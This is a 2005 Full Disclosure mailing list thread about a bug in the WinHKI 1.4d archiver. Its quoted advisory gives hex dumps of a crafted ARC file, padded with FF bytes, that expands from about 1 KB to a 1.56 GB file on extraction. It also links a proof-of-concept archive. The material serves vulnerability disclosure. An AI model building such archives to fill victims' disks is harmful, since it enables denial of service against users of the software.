Full Disclosure mailing list archives
Re: WinHKI - ARC File Extraction of 1KB to 1.56GB
From: "Rafel Ivgi" <rivgi () finjan com>
Date: Tue, 11 Jan 2005 17:44:40 +0200
The original file wasn't a 1.56 with null that were compressed, it was a smal file with 1024 FF's which was extracted to a
1.56 of nulls...that is not obvious, that is a bug. Rafel Ivgi Security Consultant----- Original Message ----- From: "bipin gautam" <visitbipin () yahoo com>
To: <full-disclosure () lists netsys com> Sent: Saturday, January 08, 2005 11:29 AM Subject: Re: [Full-disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB
that's obvious isn't it... say... if you create a few GB file with null characters, 0X00 and compress it...... that will produce a similar result. such issue is known for any file compress utility for ages. any... software will do the same! try it. and THAT'S OBVIOUS! --- "Rafel Ivgi, The-Insider" <theinsider () 012 net il> wrote:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application: WinHKI Vendors: http://www.webtoolmaster.com Versions: 1.4d Platforms: Windows Bug: ARC File Extraction of 1KB to 1.56GB Exploitation: Local (extract file) Date: 24 Dec 2004 Author: Rafel Ivgi, The-Insider E-Mail: the_insider () mail com Website: http://theinsider.deep-ice.com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~1) Introduction 2) Bugs 3) The Code~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=============== 1) Introduction =============== WinHKI is a file archiever which supports: ARC, BH, CAB, HKI, JAR, LHA,TAR, GZ compressions.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~====== 2) Bug ====== This is a normal CAB compressed file header 00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B ..251.HTM.^^^^^. 00000010 0000 0078 3139 73B5 121B 0000 003C 7363 ...x19s......<sc 00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73 ript.>alert()</s 00000030 6372 6970 743E 0D0A 1A00 cript>.... By adding after the filename header a certain amount of chars and replacing all nulls (00) with FF (in order to avoid our long string from being terminated) 00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF ..251.HTM.^^^^^. 00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................ 00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B ................ 00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363 ...x19s......<sc 00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73 ript.>alert()</s 00000430 6372 6970 743E 0D0A 1A00 cript>.... HKI will create a 1.56 GIGA BYTE file on at the selected extract location.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=========== 3) The Code =========== An online proof of concept can be found at: http://theinsider.deep-ice.com/hki156gb.ARC~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~--- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Scripts and Codes will make me D.O.S , but they will never HACK me." _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html__________________________________ Do you Yahoo!? Yahoo! Mail - Easier than ever with enhanced search. Learn more. http://info.mail.yahoo.com/mail_250 _______________________________________________ Full-Disclosure - We believe in it.Charter: http://lists.netsys.com/full-disclosure-charter.html
----------------------------------------------- This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- WinHKI - ARC File Extraction of 1KB to 1.56GB Rafel Ivgi, The-Insider (Jan 06)
- RE: WinHKI - ARC File Extraction of 1KB to 1.56GB ALD, Aditya, Aditya Lalit Deshmukh (Jan 07)
- Re: WinHKI - ARC File Extraction of 1KB to 1.56GB bipin gautam (Jan 08)
- Re: WinHKI - ARC File Extraction of 1KB to 1.56GB Rafel Ivgi (Jan 11)